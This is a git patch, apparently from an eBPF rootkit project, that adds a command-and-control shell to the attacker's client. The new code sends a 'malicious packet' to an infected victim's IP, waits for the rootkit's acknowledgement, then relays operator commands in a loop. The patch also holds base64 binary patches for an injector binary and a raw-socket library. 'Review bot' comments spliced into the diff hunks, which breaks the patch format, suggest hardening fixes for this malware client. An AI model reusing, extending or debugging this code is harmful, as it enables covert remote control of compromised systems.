From 9a47a2b15aefbc63413e58fe814c699a1b3e2cb8 Mon Sep 17 00:00:00 2001
From: h3xduck
Date: Thu, 17 Feb 2022 06:21:09 -0500
Subject: [PATCH] Completed client integration with new c&c module.
---
 src/client/client.c | 59 +++++++++++++++++-
 src/client/client.o | Bin 6952 -> 9344 bytes
 src/client/injector | Bin 37096 -> 37680 bytes
 src/client/lib/libRawTCP_Lib.a | Bin 51740 -> 51524 bytes
 src/{ebpf/include/packet/c&c => common}/c&c.h | 3 +-
 src/helpers/execve_hijack.c | 2 +
 src/helpers/lib/libRawTCP_Lib.a | Bin 51740 -> 51524 bytes
 7 files changed, 60 insertions(+), 4 deletions(-)
 rename src/{ebpf/include/packet/c&c => common}/c&c.h (61%)
diff --git a/src/client/client.c b/src/client/client.c
index dd1da95..3186f1a 100644
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -10,6 +10,7 @@
 #include
 #include "../common/constants.h"
+#include "../common/c&c.h"
 // For printing with colors
 #define KGRN "\x1B[32m"
@@ -30,9 +31,12 @@ void print_welcome_message(){
 void print_help_dialog(const char* arg){
 printf("\nUsage: %s OPTION victim_IP\n\n", arg);
 printf("Program OPTIONs\n");
- char* line = "-S";
+ char* line = "-S IP";
 char* desc = "Send a secret message to IP";
 printf("\t%-40s %-50s\n\n", line, desc);
+ line = "-c IP";
+ desc = "Activate direct command & control shell with IP";
+ printf("\t%-40s %-50s\n\n", line, desc);
 line = "-h";
 desc = "Print this help";
 printf("\t%-40s %-50s\n\n", line, desc);
@@ -135,6 +139,46 @@ void send_secret_packet(char* argv){
 free(local_ip);
 }
+void activate_command_control_shell(char* argv){
+ char* local_ip = getLocalIpAddress();
+ printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
+ check_ip_address_format(argv);
+ packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, CC_PROT_SYN);
+ printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
+ //Sending the malicious payload
+ if(rawsocket_send(packet)<0){
+ printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
+ return;
+ }else{
+ printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n");
+ }
+ printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
+
+ //Wait for rootkit ACK to ensure it's up
+ rawsocket_sniff_pattern(CC_PROT_ACK);
+ printf("["KGRN"OK"RESET"]""Success!\n");
+
+ //Received ACK, we proceed to send command
+ while(1){
+ char buf[BUFSIZ];
+ printf(""KYLW"c>:"RESET"");
+ scanf("%s", buf);
+ if(rawsocket_send(packet)<0){
+ printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n");
+ return;
+ }
+ char msg[BUFSIZ];
+ strcpy(msg, CC_PROT_MSG);
+ strcat(msg, buf);
+ printf("Sending %s\n", msg);
+ packet_t packet = rawsocket_sniff_pattern(CC_PROT_MSG);
+ char* res = packet.payload;
+ printf(""KYLW"c>:"RESET" %s\n", res);
+ }
+
+ free(local_ip);
+}
+
 void main(int argc, char* argv[]){
 if(argc<2){
@@ -154,7 +198,7 @@ void main(int argc, char* argv[]){
 char path_arg[512];
 //Command line argument parsing
- while ((opt = getopt(argc, argv, ":S:h")) != -1) {
+ while ((opt = getopt(argc, argv, ":S:c:h")) != -1) {
 switch (opt) {
 case 'S':
 print_welcome_message();
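Review bot: `scanf("%s", buf)` inside the `while(1)` loop of activate_command_control_shell has no field width, so a stdin line longer than BUFSIZ overruns the stack buffer, and the `strcpy`/`strcat` pair that builds `msg` has the same defect because `msg` is also BUFSIZ and must hold CC_PROT_MSG plus `buf`; bound both, e.g. `char buf[1024];`, `if (scanf("%1023s", buf) != 1) break;` and `snprintf(msg, sizeof msg, "%s%s", CC_PROT_MSG, buf);`, which also ends the loop on EOF instead of spinning on an uninitialised buffer. The `packet_t packet` declared in the loop body shadows the function-level `packet`, and `msg` is built and printed but never used afterwards — both look like leftovers that `-Wshadow -Wunused-variable` would flag. The `free(local_ip)` after the infinite loop is unreachable and both `return` paths leave `local_ip` allocated; `getLocalIpAddress()` presumably heap-allocates (the sibling send_secret_packet frees its result), so route the error exits through one cleanup label. The "Secret message successfully sent!" line is copied from send_secret_packet and does not describe what this function just did.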
@@ -166,6 +210,17 @@ void main(int argc, char* argv[]){
 send_secret_packet(dest_address);
 PARAM_MODULE_ACTIVATED = 1;
+ break;
+ case 'c':
+ print_welcome_message();
+ sleep(1);
+ //Send a secret message
+ printf("["KBLU"INFO"RESET"]""Activated COMMAND & CONTROL shell\n");
+ //printf("Option S has argument %s\n", optarg);
+ strcpy(dest_address, optarg);
+ activate_command_control_shell(dest_address);
+ PARAM_MODULE_ACTIVATED = 1;
+ break;
 /*case 'u':
 print_welcome_message();
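Review bot: `strcpy(dest_address, optarg)` in the new `case 'c'` copies a command-line argument of arbitrary length into `dest_address` with no bound; `dest_address` is declared outside this hunk, so if it is a fixed-size array like the nearby `path_arg[512]` the copy should be `snprintf(dest_address, sizeof dest_address, "%s", optarg);`, and if it is a pointer its capacity has to be checked against `strlen(optarg)` first. The same pattern very likely exists in the `case 'S'` branch just above the hunk, so fix both in one place. The comment `//Send a secret message` is copied from the 'S' case and no longer describes this branch — replace it with `// Open the interactive C&C shell against the given address` — and the commented-out `//printf("Option S has argument ...")` line should be deleted rather than carried along. The enclosing `switch` and `main` start and end outside this hunk.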
diff --git a/src/client/client.o b/src/client/client.o index b3311a9c68ee594d9c5a4732df4eabbf8f3a194c..9abdf7c769985952c9124dd08eb4714e365ead1a 100644 GIT binary patch literal 9344 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 BzV-kB delta 1764 zcmZWpT}TvB6rMZl&&=jJJFdI4qvE=&)Z$Mn$eKc0n1N~7V)RlJih|@rD<}m8Yb8ZQ z_;d216x1m4Niz+$K+=aEj9w&zAS&A)A`r?VNV4qSnY()04%|C?zVm(GJ@@Y1>8YCt z^!vpLZ6N>0Opx3VVRur!c$dKWq=E(~5roTgtG_ol+m+ryVLR!2zm+s~`Atfb(zm#U zRw})>wvy_u?$47zBsYYUqvQ#+NQYrs3P84;3UiVThe7Gpai@o5gV&|$W%Mvv#I)%=uYe$}*2h&3@cf8TZR1%2 z)$gEVW7CYAFzwR9Q>dDXs?Xv)FYx?1;wy;1jBq=`KO$U3_%9RB-`dhFCmH}HvUc$T zR!}uf_plS7!K!I=#5Pj~n_KsYIyz~@tuhOCysxV=N4FVYa|mE=$sD&bS`FyzK6eVjK+Sx;QYNtwT@TWX=rGb zlMvK3eK=0L!L?&d+x!q|laaQ9nbBYmHex4SgK!<;hd3VVu#o#Uf|{X)kD+P?Qne#D z2g1)HJRRXf2*=%yA{@VV_e?x&yiJ+NXp#$J?VjN6Mv#$&`16R5eHIbUEPA=m%YS^r z+voQd6>z6t5RP}Yj&RJkCDPSs#5OR=7uGn=WLb0=|63Nl>XmVVSuUuCg-oq9h-7&A z;|RygpMi^68mxHsl}1??Gxiw-nvxo@M+<+XinQ0k#^UCECc9m#!!3VGBFaL7Hy8r+H 
diff --git a/src/client/injector b/src/client/injector index b685bffdec08b9f02aeae22ee78f2354d82ec281..eb8969abe95f44acbaae4f2f357d6c2d560fc08d 100755 GIT binary patch delta 10964 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ν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 mAld|6=@`L+5*1{IAM66|F%UqXr$#c2=?Vi6P- zTc?*`&E>yh^p^j-^kA9~KKu`X^b%3gLlE>-MEG~d4t(eEecyp|YEQ-16H$5GZ50@^ z3dn{+Z(4yxaeDj|ZZuEu_%YO*!?thfnV=kA7AGi%PsI$);rPl`{^L3}moxabVjlMF zq+7%oE8lLhzPt4U*M+Y*jYq5d^by8|IOXlVn;FSn!a(T?cTRa!*TSB&oH4-+ 